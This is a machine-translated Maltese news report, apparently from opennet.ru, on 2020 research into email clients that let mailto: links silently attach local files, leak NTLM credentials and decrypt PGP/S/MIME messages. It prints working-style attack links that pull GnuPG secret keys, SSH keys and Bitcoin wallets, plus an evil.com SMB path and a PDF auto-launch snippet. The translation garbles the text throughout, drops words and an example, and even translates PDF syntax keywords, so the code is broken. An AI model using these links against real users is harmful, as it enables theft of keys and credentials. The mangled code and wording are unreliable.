Riċerkaturi mill-Università ta’ Ruhr Bochum (il-Ġermanja) () l-imġiba tal-klijenti tal-posta meta jipproċessaw links “mailto:” b’parametri avvanzati. Ħamsa mill-għoxrin klijent tal-email eżaminati kienu vulnerabbli għal attakk li jimmanipula s-sostituzzjoni tar-riżorsi bl-użu tal-parametru "ehmeż". Sitt klijenti tal-email addizzjonali kienu vulnerabbli għal attakk ta 'sostituzzjoni taċ-ċavetta PGP u S/MIME, u tliet klijenti kienu vulnerabbli għal attakk biex jiġi estratt il-kontenut ta' messaġġi kriptati.
Links «"jintużaw għall-awtomatizzazzjoni tal-ftuħ ta' klijent tal-email sabiex tikteb ittra lid-destinatarju speċifikat fil-link. Minbarra l-indirizz, tista 'tispeċifika parametri addizzjonali bħala parti mill-link, bħas-suġġett tal-ittra u mudell għal kontenut tipiku. L-attakk propost jimmanipula l-parametru "ehmeż", li jippermettilek tehmeż attachment mal-messaġġ iġġenerat.
Il-klijenti tal-posta Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) u Pegasus Mail kienu vulnerabbli għal attakk trivjali li jippermettilek tehmeż awtomatikament kwalunkwe fajl lokali, speċifikat permezz ta' link bħal "mailto:?attach=path_to_file". Il-fajl huwa mehmuż mingħajr ma jintwera twissija, għalhekk mingħajr attenzjoni speċjali, l-utent jista 'ma jinduna li l-ittra se tintbagħat b'anness.
Per eżempju, billi tuża link bħal "mailto:[protett bl-email]&subject=Titolu&body=Test&attach=~/.gnupg/secring.gpg" tista' ddaħħal ċwievet privati minn GnuPG fl-ittra. Tista 'wkoll tibgħat il-kontenut ta' kartieri kripto (~/.bitcoin/wallet.dat), ċwievet SSH (~/.ssh/id_rsa) u kwalunkwe fajl aċċessibbli għall-utent. Barra minn hekk, Thunderbird jippermettilek tehmeż gruppi ta 'fajls bil-maskra billi tuża kostruzzjonijiet bħal "attach=/tmp/*.txt".
Minbarra l-fajls lokali, xi klijenti tal-email jipproċessaw links għal ħażna tan-netwerk u mogħdijiet fis-server IMAP. B'mod partikolari, IBM Notes jippermettilek tittrasferixxi fajl minn direttorju tan-netwerk meta tipproċessa links bħal "attach=\\evil.com\dummyfile", kif ukoll tinterċetta parametri ta' awtentikazzjoni NTLM billi tibgħat link għal server SMB ikkontrollat mill-attakkant. (it-talba tintbagħat mal-utent tal-parametri tal-awtentikazzjoni attwali).
Thunderbird jipproċessa b'suċċess talbiet bħal "attach=imap:///fetch>UID>/INBOX>1/", li jippermettulek tehmeż kontenut minn folders fuq is-server IMAP. Fl-istess ħin, il-messaġġi rkuprati mill-IMAP, ikkodifikati permezz ta 'OpenPGP u S/MIME, huma awtomatikament decrypted mill-klijent tal-posta qabel ma jintbagħtu. L-iżviluppaturi ta 'Thunderbird kienu dwar il-problema fi Frar u fil-kwistjoni il-problema diġà ġiet irranġata (il-fergħat 52, 60 u 68 ta' Thunderbird jibqgħu vulnerabbli).
Verżjonijiet antiki ta 'Thunderbird kienu wkoll vulnerabbli għal żewġ varjanti oħra ta' attakk fuq PGP u S/MIME proposti mir-riċerkaturi. B'mod partikolari, Thunderbird, kif ukoll OutLook, PostBox, eM Client, MailMate u R2Mail2, kienu soġġetti għal attakk ta' sostituzzjoni ewlieni, ikkawżat mill-fatt li l-klijent tal-posta awtomatikament jimporta u jinstalla ċertifikati ġodda trażmessi f'messaġġi S/MIME, li jippermetti l-attakkant biex jorganizza sostituzzjoni ta 'ċwievet pubbliċi diġà maħżuna mill-utent.
It-tieni attakk, li Thunderbird, PostBox u MailMate huma suxxettibbli għalih, jimmanipula l-karatteristiċi tal-mekkaniżmu għall-iffrankar awtomatiku ta’ abbozzi ta’ messaġġi u jippermetti, bl-użu ta’ parametri tal-mailto, li jibda d-deċifrar ta’ messaġġi encrypted jew iż-żieda ta’ firma diġitali għal messaġġi arbitrarji, b’ trażmissjoni sussegwenti tar-riżultat lis-server IMAP tal-attakkant. F'dan l-attakk, iċ-ciphertext jiġi trażmess permezz tal-parametru "korp", u t-tikketta "meta refresh" tintuża biex tibda sejħa lis-server IMAP tal-attakkant. Pereżempju: ' '
Biex tipproċessa awtomatikament links "mailto:" mingħajr interazzjoni tal-utent, jistgħu jintużaw dokumenti PDF ddisinjati apposta - l-azzjoni OpenAction f'PDF tippermettilek li tniedi awtomatikament il-mailto handler meta tiftaħ dokument:
%PDF-1.5
1 0 obj
<< /Tip /Katalgu /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Tip /Azzjoni /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj
Sors: opennet.ru